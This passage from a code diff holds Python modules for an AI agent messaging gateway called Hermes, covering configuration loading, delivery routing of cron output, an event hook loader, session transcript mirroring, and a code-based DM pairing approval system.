return self.reset_by_type[session_type]
return self.default_reset_policy
def to_dict(self) -> Dict[str, Any]:
return {
"platforms": {
p.value: c.to_dict() for p, c in self.platforms.items()
},
"default_reset_policy": self.default_reset_policy.to_dict(),
"reset_by_type": {
k: v.to_dict() for k, v in self.reset_by_type.items()
},
"reset_by_platform": {
p.value: v.to_dict() for p, v in self.reset_by_platform.items()
},
"reset_triggers": self.reset_triggers,
"sessions_dir": str(self.sessions_dir),
"always_log_local": self.always_log_local,
}
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "GatewayConfig":
platforms = {}
for platform_name, platform_data in data.get("platforms", {}).items():
try:
platform = Platform(platform_name)
platforms[platform] = PlatformConfig.from_dict(platform_data)
except ValueError:
pass # Skip unknown platforms
reset_by_type = {}
for type_name, policy_data in data.get("reset_by_type", {}).items():
reset_by_type[type_name] = SessionResetPolicy.from_dict(policy_data)
reset_by_platform = {}
for platform_name, policy_data in data.get("reset_by_platform", {}).items():
try:
platform = Platform(platform_name)
reset_by_platform[platform] = SessionResetPolicy.from_dict(policy_data)
except ValueError:
pass
default_policy = SessionResetPolicy()
if "default_reset_policy" in data:
default_policy = SessionResetPolicy.from_dict(data["default_reset_policy"])
sessions_dir = Path.home() / ".hermes" / "sessions"
if "sessions_dir" in data:
sessions_dir = Path(data["sessions_dir"])
return cls(
platforms=platforms,
default_reset_policy=default_policy,
reset_by_type=reset_by_type,
reset_by_platform=reset_by_platform,
reset_triggers=data.get("reset_triggers", ["/new", "/reset"]),
sessions_dir=sessions_dir,
always_log_local=data.get("always_log_local", True),
)
def load_gateway_config() -> GatewayConfig:
"""
Load gateway configuration from multiple sources.
Priority (highest to lowest):
1. Environment variables
2. ~/.hermes/gateway.json
3. cli-config.yaml gateway section
4. Defaults
"""
config = GatewayConfig()
# Try loading from ~/.hermes/gateway.json
gateway_config_path = Path.home() / ".hermes" / "gateway.json"
if gateway_config_path.exists():
try:
with open(gateway_config_path, "r", encoding="utf-8") as f:
data = json.load(f)
config = GatewayConfig.from_dict(data)
except Exception as e:
print(f"[gateway] Warning: Failed to load {gateway_config_path}: {e}")
# Bridge session_reset from config.yaml (the user-facing config file)
# into the gateway config. config.yaml takes precedence over gateway.json
# for session reset policy since that's where hermes setup writes it.
try:
import yaml
config_yaml_path = Path.home() / ".hermes" / "config.yaml"
if config_yaml_path.exists():
with open(config_yaml_path, encoding="utf-8") as f:
yaml_cfg = yaml.safe_load(f) or {}
sr = yaml_cfg.get("session_reset")
if sr and isinstance(sr, dict):
config.default_reset_policy = SessionResetPolicy.from_dict(sr)
# Bridge discord settings from config.yaml to env vars
# (env vars take precedence — only set if not already defined)
discord_cfg = yaml_cfg.get("discord", {})
if isinstance(discord_cfg, dict):
if "require_mention" in discord_cfg and not os.getenv("DISCORD_REQUIRE_MENTION"):
os.environ["DISCORD_REQUIRE_MENTION"] = str(discord_cfg["require_mention"]).lower()
frc = discord_cfg.get("free_response_channels")
if frc is not None and not os.getenv("DISCORD_FREE_RESPONSE_CHANNELS"):
if isinstance(frc, list):
frc = ",".join(str(v) for v in frc)
os.environ["DISCORD_FREE_RESPONSE_CHANNELS"] = str(frc)
if "auto_thread" in discord_cfg and not os.getenv("DISCORD_AUTO_THREAD"):
os.environ["DISCORD_AUTO_THREAD"] = str(discord_cfg["auto_thread"]).lower()
except Exception:
pass
# Override with environment variables
_apply_env_overrides(config)
# --- Validate loaded values ---
policy = config.default_reset_policy
if not (0 <= policy.at_hour <= 23):
logger.warning(
"Invalid at_hour=%s (must be 0-23). Using default 4.", policy.at_hour
)
policy.at_hour = 4
if policy.idle_minutes is None or policy.idle_minutes <= 0:
logger.warning(
"Invalid idle_minutes=%s (must be positive). Using default 1440.",
policy.idle_minutes,
)
policy.idle_minutes = 1440
# Warn about empty bot tokens — platforms that loaded an empty string
# won't connect and the cause can be confusing without a log line.
_token_env_names = {
Platform.TELEGRAM: "TELEGRAM_BOT_TOKEN",
Platform.DISCORD: "DISCORD_BOT_TOKEN",
Platform.SLACK: "SLACK_BOT_TOKEN",
}
for platform, pconfig in config.platforms.items():
if not pconfig.enabled:
continue
env_name = _token_env_names.get(platform)
if env_name and pconfig.token is not None and not pconfig.token.strip():
logger.warning(
"%s is enabled but %s is empty. "
"The adapter will likely fail to connect.",
platform.value, env_name,
)
return config
def _apply_env_overrides(config: GatewayConfig) -> None:
"""Apply environment variable overrides to config."""
# Telegram
telegram_token = os.getenv("TELEGRAM_BOT_TOKEN")
if telegram_token:
if Platform.TELEGRAM not in config.platforms:
config.platforms[Platform.TELEGRAM] = PlatformConfig()
config.platforms[Platform.TELEGRAM].enabled = True
config.platforms[Platform.TELEGRAM].token = telegram_token
telegram_home = os.getenv("TELEGRAM_HOME_CHANNEL")
if telegram_home and Platform.TELEGRAM in config.platforms:
config.platforms[Platform.TELEGRAM].home_channel = HomeChannel(
platform=Platform.TELEGRAM,
chat_id=telegram_home,
name=os.getenv("TELEGRAM_HOME_CHANNEL_NAME", "Home"),
)
# Discord
discord_token = os.getenv("DISCORD_BOT_TOKEN")
if discord_token:
if Platform.DISCORD not in config.platforms:
config.platforms[Platform.DISCORD] = PlatformConfig()
config.platforms[Platform.DISCORD].enabled = True
config.platforms[Platform.DISCORD].token = discord_token
discord_home = os.getenv("DISCORD_HOME_CHANNEL")
if discord_home and Platform.DISCORD in config.platforms:
config.platforms[Platform.DISCORD].home_channel = HomeChannel(
platform=Platform.DISCORD,
chat_id=discord_home,
name=os.getenv("DISCORD_HOME_CHANNEL_NAME", "Home"),
)
# WhatsApp (typically uses different auth mechanism)
whatsapp_enabled = os.getenv("WHATSAPP_ENABLED", "").lower() in ("true", "1", "yes")
if whatsapp_enabled:
if Platform.WHATSAPP not in config.platforms:
config.platforms[Platform.WHATSAPP] = PlatformConfig()
config.platforms[Platform.WHATSAPP].enabled = True
# Slack
slack_token = os.getenv("SLACK_BOT_TOKEN")
if slack_token:
if Platform.SLACK not in config.platforms:
config.platforms[Platform.SLACK] = PlatformConfig()
config.platforms[Platform.SLACK].enabled = True
config.platforms[Platform.SLACK].token = slack_token
# Home channel
slack_home = os.getenv("SLACK_HOME_CHANNEL")
if slack_home:
config.platforms[Platform.SLACK].home_channel = HomeChannel(
platform=Platform.SLACK,
chat_id=slack_home,
name=os.getenv("SLACK_HOME_CHANNEL_NAME", ""),
)
# Signal
signal_url = os.getenv("SIGNAL_HTTP_URL")
signal_account = os.getenv("SIGNAL_ACCOUNT")
if signal_url and signal_account:
if Platform.SIGNAL not in config.platforms:
config.platforms[Platform.SIGNAL] = PlatformConfig()
config.platforms[Platform.SIGNAL].enabled = True
config.platforms[Platform.SIGNAL].extra.update({
"http_url": signal_url,
"account": signal_account,
"ignore_stories": os.getenv("SIGNAL_IGNORE_STORIES", "true").lower() in ("true", "1", "yes"),
})
signal_home = os.getenv("SIGNAL_HOME_CHANNEL")
if signal_home:
config.platforms[Platform.SIGNAL].home_channel = HomeChannel(
platform=Platform.SIGNAL,
chat_id=signal_home,
name=os.getenv("SIGNAL_HOME_CHANNEL_NAME", "Home"),
)
# Home Assistant
hass_token = os.getenv("HASS_TOKEN")
if hass_token:
if Platform.HOMEASSISTANT not in config.platforms:
config.platforms[Platform.HOMEASSISTANT] = PlatformConfig()
config.platforms[Platform.HOMEASSISTANT].enabled = True
config.platforms[Platform.HOMEASSISTANT].token = hass_token
hass_url = os.getenv("HASS_URL")
if hass_url:
config.platforms[Platform.HOMEASSISTANT].extra["url"] = hass_url
# Email
email_addr = os.getenv("EMAIL_ADDRESS")
email_pwd = os.getenv("EMAIL_PASSWORD")
email_imap = os.getenv("EMAIL_IMAP_HOST")
email_smtp = os.getenv("EMAIL_SMTP_HOST")
if all([email_addr, email_pwd, email_imap, email_smtp]):
if Platform.EMAIL not in config.platforms:
config.platforms[Platform.EMAIL] = PlatformConfig()
config.platforms[Platform.EMAIL].enabled = True
config.platforms[Platform.EMAIL].extra.update({
"address": email_addr,
"imap_host": email_imap,
"smtp_host": email_smtp,
})
email_home = os.getenv("EMAIL_HOME_ADDRESS")
if email_home:
config.platforms[Platform.EMAIL].home_channel = HomeChannel(
platform=Platform.EMAIL,
chat_id=email_home,
name=os.getenv("EMAIL_HOME_ADDRESS_NAME", "Home"),
)
# Session settings
idle_minutes = os.getenv("SESSION_IDLE_MINUTES")
if idle_minutes:
try:
config.default_reset_policy.idle_minutes = int(idle_minutes)
except ValueError:
pass
reset_hour = os.getenv("SESSION_RESET_HOUR")
if reset_hour:
try:
config.default_reset_policy.at_hour = int(reset_hour)
except ValueError:
pass
def save_gateway_config(config: GatewayConfig) -> None:
"""Save gateway configuration to ~/.hermes/gateway.json."""
gateway_config_path = Path.home() / ".hermes" / "gateway.json"
gateway_config_path.parent.mkdir(parents=True, exist_ok=True)
with open(gateway_config_path, "w", encoding="utf-8") as f:
json.dump(config.to_dict(), f, indent=2)

345
gateway/delivery.py Normal file
View File

@@ -0,0 +1,345 @@
"""
Delivery routing for cron job outputs and agent responses.
Routes messages to the appropriate destination based on:
- Explicit targets (e.g., "telegram:123456789")
- Platform home channels (e.g., "telegram" → home channel)
- Origin (back to where the job was created)
- Local (always saved to files)
"""
import logging
from pathlib import Path
from datetime import datetime
from dataclasses import dataclass
from typing import Dict, List, Optional, Any, Union
from enum import Enum
logger = logging.getLogger(__name__)
MAX_PLATFORM_OUTPUT = 4000
TRUNCATED_VISIBLE = 3800
from .config import Platform, GatewayConfig
from .session import SessionSource
@dataclass
class DeliveryTarget:
"""
A single delivery target.
Represents where a message should be sent:
- "origin" → back to source
- "local" → save to local files
- "telegram" → Telegram home channel
- "telegram:123456" → specific Telegram chat
"""
platform: Platform
chat_id: Optional[str] = None # None means use home channel
thread_id: Optional[str] = None
is_origin: bool = False
is_explicit: bool = False # True if chat_id was explicitly specified
@classmethod
def parse(cls, target: str, origin: Optional[SessionSource] = None) -> "DeliveryTarget":
"""
Parse a delivery target string.
Formats:
- "origin" → back to source
- "local" → local files only
- "telegram" → Telegram home channel
- "telegram:123456" → specific Telegram chat
"""
target = target.strip().lower()
if target == "origin":
if origin:
return cls(
platform=origin.platform,
chat_id=origin.chat_id,
thread_id=origin.thread_id,
is_origin=True,
)
else:
# Fallback to local if no origin
return cls(platform=Platform.LOCAL, is_origin=True)
if target == "local":
return cls(platform=Platform.LOCAL)
# Check for platform:chat_id format
if ":" in target:
platform_str, chat_id = target.split(":", 1)
try:
platform = Platform(platform_str)
return cls(platform=platform, chat_id=chat_id, is_explicit=True)
except ValueError:
# Unknown platform, treat as local
return cls(platform=Platform.LOCAL)
# Just a platform name (use home channel)
try:
platform = Platform(target)
return cls(platform=platform)
except ValueError:
# Unknown platform, treat as local
return cls(platform=Platform.LOCAL)
def to_string(self) -> str:
"""Convert back to string format."""
if self.is_origin:
return "origin"
if self.platform == Platform.LOCAL:
return "local"
if self.chat_id:
return f"{self.platform.value}:{self.chat_id}"
return self.platform.value
class DeliveryRouter:
"""
Routes messages to appropriate destinations.
Handles the logic of resolving delivery targets and dispatching
messages to the right platform adapters.
"""
def __init__(self, config: GatewayConfig, adapters: Dict[Platform, Any] = None):
"""
Initialize the delivery router.
Args:
config: Gateway configuration
adapters: Dict mapping platforms to their adapter instances
"""
self.config = config
self.adapters = adapters or {}
self.output_dir = Path.home() / ".hermes" / "cron" / "output"
def resolve_targets(
self,
deliver: Union[str, List[str]],
origin: Optional[SessionSource] = None
) -> List[DeliveryTarget]:
"""
Resolve delivery specification to concrete targets.
Args:
deliver: Delivery spec - "origin", "telegram", ["local", "discord"], etc.
origin: The source where the request originated (for "origin" target)
Returns:
List of resolved delivery targets
"""
if isinstance(deliver, str):
deliver = [deliver]
targets = []
seen_platforms = set()
for target_str in deliver:
target = DeliveryTarget.parse(target_str, origin)
# Resolve home channel if needed
if target.chat_id is None and target.platform != Platform.LOCAL:
home = self.config.get_home_channel(target.platform)
if home:
target.chat_id = home.chat_id
else:
# No home channel configured, skip this platform
continue
# Deduplicate
key = (target.platform, target.chat_id, target.thread_id)
if key not in seen_platforms:
seen_platforms.add(key)
targets.append(target)
# Always include local if configured
if self.config.always_log_local:
local_key = (Platform.LOCAL, None)
if local_key not in seen_platforms:
targets.append(DeliveryTarget(platform=Platform.LOCAL))
return targets
async def deliver(
self,
content: str,
targets: List[DeliveryTarget],
job_id: Optional[str] = None,
job_name: Optional[str] = None,
metadata: Optional[Dict[str, Any]] = None
) -> Dict[str, Any]:
"""
Deliver content to all specified targets.
Args:
content: The message/output to deliver
targets: List of delivery targets
job_id: Optional job ID (for cron jobs)
job_name: Optional job name
metadata: Additional metadata to include
Returns:
Dict with delivery results per target
"""
results = {}
for target in targets:
try:
if target.platform == Platform.LOCAL:
result = self._deliver_local(content, job_id, job_name, metadata)
else:
result = await self._deliver_to_platform(target, content, metadata)
results[target.to_string()] = {
"success": True,
"result": result
}
except Exception as e:
results[target.to_string()] = {
"success": False,
"error": str(e)
}
return results
def _deliver_local(
self,
content: str,
job_id: Optional[str],
job_name: Optional[str],
metadata: Optional[Dict[str, Any]]
) -> Dict[str, Any]:
"""Save content to local files."""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if job_id:
output_path = self.output_dir / job_id / f"{timestamp}.md"
else:
output_path = self.output_dir / "misc" / f"{timestamp}.md"
output_path.parent.mkdir(parents=True, exist_ok=True)
# Build the output document
lines = []
if job_name:
lines.append(f"# {job_name}")
else:
lines.append("# Delivery Output")
lines.append("")
lines.append(f"**Timestamp:** {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
if job_id:
lines.append(f"**Job ID:** {job_id}")
if metadata:
for key, value in metadata.items():
lines.append(f"**{key}:** {value}")
lines.append("")
lines.append("---")
lines.append("")
lines.append(content)
output_path.write_text("\n".join(lines))
return {
"path": str(output_path),
"timestamp": timestamp
}
def _save_full_output(self, content: str, job_id: str) -> Path:
"""Save full cron output to disk and return the file path."""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
out_dir = Path.home() / ".hermes" / "cron" / "output"
out_dir.mkdir(parents=True, exist_ok=True)
path = out_dir / f"{job_id}_{timestamp}.txt"
path.write_text(content)
return path
async def _deliver_to_platform(
self,
target: DeliveryTarget,
content: str,
metadata: Optional[Dict[str, Any]]
) -> Dict[str, Any]:
"""Deliver content to a messaging platform."""
adapter = self.adapters.get(target.platform)
if not adapter:
raise ValueError(f"No adapter configured for {target.platform.value}")
if not target.chat_id:
raise ValueError(f"No chat ID for {target.platform.value} delivery")
# Guard: truncate oversized cron output to stay within platform limits
if len(content) > MAX_PLATFORM_OUTPUT:
job_id = (metadata or {}).get("job_id", "unknown")
saved_path = self._save_full_output(content, job_id)
logger.info("Cron output truncated (%d chars) — full output: %s", len(content), saved_path)
content = (
content[:TRUNCATED_VISIBLE]
+ f"\n\n... [truncated, full output saved to {saved_path}]"
)
send_metadata = dict(metadata or {})
if target.thread_id and "thread_id" not in send_metadata:
send_metadata["thread_id"] = target.thread_id
return await adapter.send(target.chat_id, content, metadata=send_metadata or None)
def parse_deliver_spec(
deliver: Optional[Union[str, List[str]]],
origin: Optional[SessionSource] = None,
default: str = "origin"
) -> Union[str, List[str]]:
"""
Normalize a delivery specification.
If None or empty, returns the default.
"""
if not deliver:
return default
return deliver
def build_delivery_context_for_tool(
config: GatewayConfig,
origin: Optional[SessionSource] = None
) -> Dict[str, Any]:
"""
Build context for the schedule_cronjob tool to understand delivery options.
This is passed to the tool so it can validate and explain delivery targets.
"""
connected = config.get_connected_platforms()
options = {
"origin": {
"description": "Back to where this job was created",
"available": origin is not None,
},
"local": {
"description": "Save to local files only",
"available": True,
}
}
for platform in connected:
home = config.get_home_channel(platform)
options[platform.value] = {
"description": f"{platform.value.title()} home channel",
"available": True,
"home_channel": home.to_dict() if home else None,
}
return {
"origin": origin.to_dict() if origin else None,
"options": options,
"always_log_local": config.always_log_local,
}

150
gateway/hooks.py Normal file
View File

@@ -0,0 +1,150 @@
"""
Event Hook System
A lightweight event-driven system that fires handlers at key lifecycle points.
Hooks are discovered from ~/.hermes/hooks/ directories, each containing:
- HOOK.yaml (metadata: name, description, events list)
- handler.py (Python handler with async def handle(event_type, context))
Events:
- gateway:startup -- Gateway process starts
- session:start -- New session created
- session:reset -- User ran /new or /reset
- agent:start -- Agent begins processing a message
- agent:step -- Each turn in the tool-calling loop
- agent:end -- Agent finishes processing
- command:* -- Any slash command executed (wildcard match)
Errors in hooks are caught and logged but never block the main pipeline.
"""
import asyncio
import importlib.util
import os
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional
import yaml
HOOKS_DIR = Path(os.path.expanduser("~/.hermes/hooks"))
class HookRegistry:
"""
Discovers, loads, and fires event hooks.
Usage:
registry = HookRegistry()
registry.discover_and_load()
await registry.emit("agent:start", {"platform": "telegram", ...})
"""
def __init__(self):
# event_type -> [handler_fn, ...]
self._handlers: Dict[str, List[Callable]] = {}
self._loaded_hooks: List[dict] = [] # metadata for listing
@property
def loaded_hooks(self) -> List[dict]:
"""Return metadata about all loaded hooks."""
return list(self._loaded_hooks)
def discover_and_load(self) -> None:
"""
Scan the hooks directory for hook directories and load their handlers.
Each hook directory must contain:
- HOOK.yaml with at least 'name' and 'events' keys
- handler.py with a top-level 'handle' function (sync or async)
"""
if not HOOKS_DIR.exists():
return
for hook_dir in sorted(HOOKS_DIR.iterdir()):
if not hook_dir.is_dir():
continue
manifest_path = hook_dir / "HOOK.yaml"
handler_path = hook_dir / "handler.py"
if not manifest_path.exists() or not handler_path.exists():
continue
try:
manifest = yaml.safe_load(manifest_path.read_text(encoding="utf-8"))
if not manifest or not isinstance(manifest, dict):
print(f"[hooks] Skipping {hook_dir.name}: invalid HOOK.yaml", flush=True)
continue
hook_name = manifest.get("name", hook_dir.name)
events = manifest.get("events", [])
if not events:
print(f"[hooks] Skipping {hook_name}: no events declared", flush=True)
continue
# Dynamically load the handler module
spec = importlib.util.spec_from_file_location(
f"hermes_hook_{hook_name}", handler_path
)
if spec is None or spec.loader is None:
print(f"[hooks] Skipping {hook_name}: could not load handler.py", flush=True)
continue
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
handle_fn = getattr(module, "handle", None)
if handle_fn is None:
print(f"[hooks] Skipping {hook_name}: no 'handle' function found", flush=True)
continue
# Register the handler for each declared event
for event in events:
self._handlers.setdefault(event, []).append(handle_fn)
self._loaded_hooks.append({
"name": hook_name,
"description": manifest.get("description", ""),
"events": events,
"path": str(hook_dir),
})
print(f"[hooks] Loaded hook '{hook_name}' for events: {events}", flush=True)
except Exception as e:
print(f"[hooks] Error loading hook {hook_dir.name}: {e}", flush=True)
async def emit(self, event_type: str, context: Optional[Dict[str, Any]] = None) -> None:
"""
Fire all handlers registered for an event.
Supports wildcard matching: handlers registered for "command:*" will
fire for any "command:..." event. Handlers registered for a base type
like "agent" won't fire for "agent:start" -- only exact matches and
explicit wildcards.
Args:
event_type: The event identifier (e.g. "agent:start").
context: Optional dict with event-specific data.
"""
if context is None:
context = {}
# Collect handlers: exact match + wildcard match
handlers = list(self._handlers.get(event_type, []))
# Check for wildcard patterns (e.g., "command:*" matches "command:reset")
if ":" in event_type:
base = event_type.split(":")[0]
wildcard_key = f"{base}:*"
handlers.extend(self._handlers.get(wildcard_key, []))
for fn in handlers:
try:
result = fn(event_type, context)
# Support both sync and async handlers
if asyncio.iscoroutine(result):
await result
except Exception as e:
print(f"[hooks] Error in handler for '{event_type}': {e}", flush=True)

131
gateway/mirror.py Normal file
View File

@@ -0,0 +1,131 @@
"""
Session mirroring for cross-platform message delivery.
When a message is sent to a platform (via send_message or cron delivery),
this module appends a "delivery-mirror" record to the target session's
transcript so the receiving-side agent has context about what was sent.
Standalone -- works from CLI, cron, and gateway contexts without needing
the full SessionStore machinery.
"""
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Optional
logger = logging.getLogger(__name__)
_SESSIONS_DIR = Path.home() / ".hermes" / "sessions"
_SESSIONS_INDEX = _SESSIONS_DIR / "sessions.json"
def mirror_to_session(
platform: str,
chat_id: str,
message_text: str,
source_label: str = "cli",
thread_id: Optional[str] = None,
) -> bool:
"""
Append a delivery-mirror message to the target session's transcript.
Finds the gateway session that matches the given platform + chat_id,
then writes a mirror entry to both the JSONL transcript and SQLite DB.
Returns True if mirrored successfully, False if no matching session or error.
All errors are caught -- this is never fatal.
"""
try:
session_id = _find_session_id(platform, str(chat_id), thread_id=thread_id)
if not session_id:
logger.debug("Mirror: no session found for %s:%s:%s", platform, chat_id, thread_id)
return False
mirror_msg = {
"role": "assistant",
"content": message_text,
"timestamp": datetime.now().isoformat(),
"mirror": True,
"mirror_source": source_label,
}
_append_to_jsonl(session_id, mirror_msg)
_append_to_sqlite(session_id, mirror_msg)
logger.debug("Mirror: wrote to session %s (from %s)", session_id, source_label)
return True
except Exception as e:
logger.debug("Mirror failed for %s:%s:%s: %s", platform, chat_id, thread_id, e)
return False
def _find_session_id(platform: str, chat_id: str, thread_id: Optional[str] = None) -> Optional[str]:
"""
Find the active session_id for a platform + chat_id pair.
Scans sessions.json entries and matches where origin.chat_id == chat_id
on the right platform. DM session keys don't embed the chat_id
(e.g. "agent:main:telegram:dm"), so we check the origin dict.
"""
if not _SESSIONS_INDEX.exists():
return None
try:
with open(_SESSIONS_INDEX, encoding="utf-8") as f:
data = json.load(f)
except Exception:
return None
platform_lower = platform.lower()
best_match = None
best_updated = ""
for _key, entry in data.items():
origin = entry.get("origin") or {}
entry_platform = (origin.get("platform") or entry.get("platform", "")).lower()
if entry_platform != platform_lower:
continue
origin_chat_id = str(origin.get("chat_id", ""))
if origin_chat_id == str(chat_id):
origin_thread_id = origin.get("thread_id")
if thread_id is not None and str(origin_thread_id or "") != str(thread_id):
continue
updated = entry.get("updated_at", "")
if updated > best_updated:
best_updated = updated
best_match = entry.get("session_id")
return best_match
def _append_to_jsonl(session_id: str, message: dict) -> None:
"""Append a message to the JSONL transcript file."""
transcript_path = _SESSIONS_DIR / f"{session_id}.jsonl"
try:
with open(transcript_path, "a", encoding="utf-8") as f:
f.write(json.dumps(message, ensure_ascii=False) + "\n")
except Exception as e:
logger.debug("Mirror JSONL write failed: %s", e)
def _append_to_sqlite(session_id: str, message: dict) -> None:
"""Append a message to the SQLite session database."""
db = None
try:
from hermes_state import SessionDB
db = SessionDB()
db.append_message(
session_id=session_id,
role=message.get("role", "assistant"),
content=message.get("content"),
)
except Exception as e:
logger.debug("Mirror SQLite write failed: %s", e)
finally:
if db is not None:
db.close()

282
gateway/pairing.py Normal file
View File

@@ -0,0 +1,282 @@
"""
DM Pairing System
Code-based approval flow for authorizing new users on messaging platforms.
Instead of static allowlists with user IDs, unknown users receive a one-time
pairing code that the bot owner approves via the CLI.
Security features (based on OWASP + NIST SP 800-63-4 guidance):
- 8-char codes from 32-char unambiguous alphabet (no 0/O/1/I)
- Cryptographic randomness via secrets.choice()
- 1-hour code expiry
- Max 3 pending codes per platform
- Rate limiting: 1 request per user per 10 minutes
- Lockout after 5 failed approval attempts (1 hour)
- File permissions: chmod 0600 on all data files
- Codes are never logged to stdout
Storage: ~/.hermes/pairing/
"""
import json
import os
import secrets
import time
from pathlib import Path
from typing import Optional
# Unambiguous alphabet -- excludes 0/O, 1/I to prevent confusion
ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
CODE_LENGTH = 8
# Timing constants
CODE_TTL_SECONDS = 3600 # Codes expire after 1 hour
RATE_LIMIT_SECONDS = 600 # 1 request per user per 10 minutes
LOCKOUT_SECONDS = 3600 # Lockout duration after too many failures
# Limits
MAX_PENDING_PER_PLATFORM = 3 # Max pending codes per platform
MAX_FAILED_ATTEMPTS = 5 # Failed approvals before lockout
PAIRING_DIR = Path(os.path.expanduser("~/.hermes/pairing"))
def _secure_write(path: Path, data: str) -> None:
"""Write data to file with restrictive permissions (owner read/write only)."""
path.parent.mkdir(parents=True, exist_ok=True)
path.write_text(data, encoding="utf-8")
try:
os.chmod(path, 0o600)
except OSError:
pass # Windows doesn't support chmod the same way
class PairingStore:
"""
Manages pairing codes and approved user lists.
Data files per platform:
- {platform}-pending.json : pending pairing requests
- {platform}-approved.json : approved (paired) users
- _rate_limits.json : rate limit tracking
"""
def __init__(self):
PAIRING_DIR.mkdir(parents=True, exist_ok=True)
def _pending_path(self, platform: str) -> Path:
return PAIRING_DIR / f"{platform}-pending.json"
def _approved_path(self, platform: str) -> Path:
return PAIRING_DIR / f"{platform}-approved.json"
def _rate_limit_path(self) -> Path:
return PAIRING_DIR / "_rate_limits.json"
def _load_json(self, path: Path) -> dict:
if path.exists():
try:
return json.loads(path.read_text(encoding="utf-8"))
except (json.JSONDecodeError, OSError):
return {}
return {}
def _save_json(self, path: Path, data: dict) -> None:
_secure_write(path, json.dumps(data, indent=2, ensure_ascii=False))
# ----- Approved users -----
def is_approved(self, platform: str, user_id: str) -> bool:
"""Check if a user is approved (paired) on a platform."""
approved = self._load_json(self._approved_path(platform))
return user_id in approved
def list_approved(self, platform: str = None) -> list:
"""List approved users, optionally filtered by platform."""
results = []
platforms = [platform] if platform else self._all_platforms("approved")
for p in platforms:
approved = self._load_json(self._approved_path(p))
for uid, info in approved.items():
results.append({"platform": p, "user_id": uid, **info})
return results
def _approve_user(self, platform: str, user_id: str, user_name: str = "") -> None:
"""Add a user to the approved list."""
approved = self._load_json(self._approved_path(platform))
approved[user_id] = {
"user_name": user_name,
"approved_at": time.time(),
}
self._save_json(self._approved_path(platform), approved)
def revoke(self, platform: str, user_id: str) -> bool:
"""Remove a user from the approved list. Returns True if found."""
path = self._approved_path(platform)
approved = self._load_json(path)
if user_id in approved:
del approved[user_id]
self._save_json(path, approved)
return True
return False
# ----- Pending codes -----
def generate_code(
self, platform: str, user_id: str, user_name: str = ""
) -> Optional[str]:
"""
Generate a pairing code for a new user.
Returns the code string, or None if:
- User is rate-limited (too recent request)
- Max pending codes reached for this platform
- User/platform is in lockout due to failed attempts
"""
self._cleanup_expired(platform)
# Check lockout
if self._is_locked_out(platform):
return None
# Check rate limit for this specific user
if self._is_rate_limited(platform, user_id):
return None
# Check max pending
pending = self._load_json(self._pending_path(platform))
if len(pending) >= MAX_PENDING_PER_PLATFORM:
return None
# Generate cryptographically random code
code = "".join(secrets.choice(ALPHABET) for _ in range(CODE_LENGTH))
# Store pending request
pending[code] = {
"user_id": user_id,
"user_name": user_name,
"created_at": time.time(),
}
self._save_json(self._pending_path(platform), pending)
# Record rate limit
self._record_rate_limit(platform, user_id)
return code
def approve_code(self, platform: str, code: str) -> Optional[dict]:
"""
Approve a pairing code. Adds the user to the approved list.
Returns {user_id, user_name} on success, None if code is invalid/expired.
"""
self._cleanup_expired(platform)
code = code.upper().strip()
pending = self._load_json(self._pending_path(platform))
if code not in pending:
self._record_failed_attempt(platform)
return None
entry = pending.pop(code)
self._save_json(self._pending_path(platform), pending)
# Add to approved list
self._approve_user(platform, entry["user_id"], entry.get("user_name", ""))
return {
"user_id": entry["user_id"],
"user_name": entry.get("user_name", ""),
}
def list_pending(self, platform: str = None) -> list:
"""List pending pairing requests, optionally filtered by platform."""
results = []
platforms = [platform] if platform else self._all_platforms("pending")
for p in platforms:
self._cleanup_expired(p)
pending = self._load_json(self._pending_path(p))
for code, info in pending.items():
age_min = int((time.time() - info["created_at"]) / 60)
results.append({
"platform": p,
"code": code,
"user_id": info["user_id"],
"user_name": info.get("user_name", ""),
"age_minutes": age_min,
})
return results
def clear_pending(self, platform: str = None) -> int:
"""Clear all pending requests. Returns count removed."""
count = 0
platforms = [platform] if platform else self._all_platforms("pending")
for p in platforms:
pending = self._load_json(self._pending_path(p))
count += len(pending)
self._save_json(self._pending_path(p), {})
return count
# ----- Rate limiting and lockout -----
def _is_rate_limited(self, platform: str, user_id: str) -> bool:
"""Check if a user has requested a code too recently."""
limits = self._load_json(self._rate_limit_path())
key = f"{platform}:{user_id}"
last_request = limits.get(key, 0)
return (time.time() - last_request) < RATE_LIMIT_SECONDS
def _record_rate_limit(self, platform: str, user_id: str) -> None:
"""Record the time of a pairing request for rate limiting."""
limits = self._load_json(self._rate_limit_path())
key = f"{platform}:{user_id}"
limits[key] = time.time()
self._save_json(self._rate_limit_path(), limits)
def _is_locked_out(self, platform: str) -> bool:
"""Check if a platform is in lockout due to failed approval attempts."""
limits = self._load_json(self._rate_limit_path())
lockout_key = f"_lockout:{platform}"
lockout_until = limits.get(lockout_key, 0)
return time.time() < lockout_until
def _record_failed_attempt(self, platform: str) -> None:
"""Record a failed approval attempt. Triggers lockout after MAX_FAILED_ATTEMPTS."""
limits = self._load_json(self._rate_limit_path())
fail_key = f"_failures:{platform}"
fails = limits.get(fail_key, 0) + 1
limits[fail_key] = fails
if fails >= MAX_FAILED_ATTEMPTS:
lockout_key = f"_lockout:{platform}"
limits[lockout_key] = time.time() + LOCKOUT_SECONDS
limits[fail_key] = 0 # Reset counter
print(f"[pairing] Platform {platform} locked out for {LOCKOUT_SECONDS}s "
f"after {MAX_FAILED_ATTEMPTS} failed attempts", flush=True)
self._save_json(self._rate_limit_path(), limits)
# ----- Cleanup -----
def _cleanup_expired(self, platform: str) -> None:
"""Remove expired pending codes."""
path = self._pending_path(platform)
pending = self._load_json(path)
now = time.time()
expired = [
code for code, info in pending.items()
if (now - info["created_at"]) > CODE_TTL_SECONDS
]
if expired:
for code in expired:
del pending[code]
self._save_json(path, pending)
def _all_platforms(self, suffix: str) -> list:
"""List all platforms that have data files of a given suffix."""
platforms = []
for f in PAIRING_DIR.iterdir():
if f.name.endswith(f"-{suffix}.json"):
platform = f.name.replace(f"-{suffix}.json", "")
if not platform.startswith("_"):
platforms.append(platform)
return platforms

View File

@@ -0,0 +1,313 @@
# Adding a New Messaging Platform
Checklist for integrating a new messaging platform into the Hermes gateway.
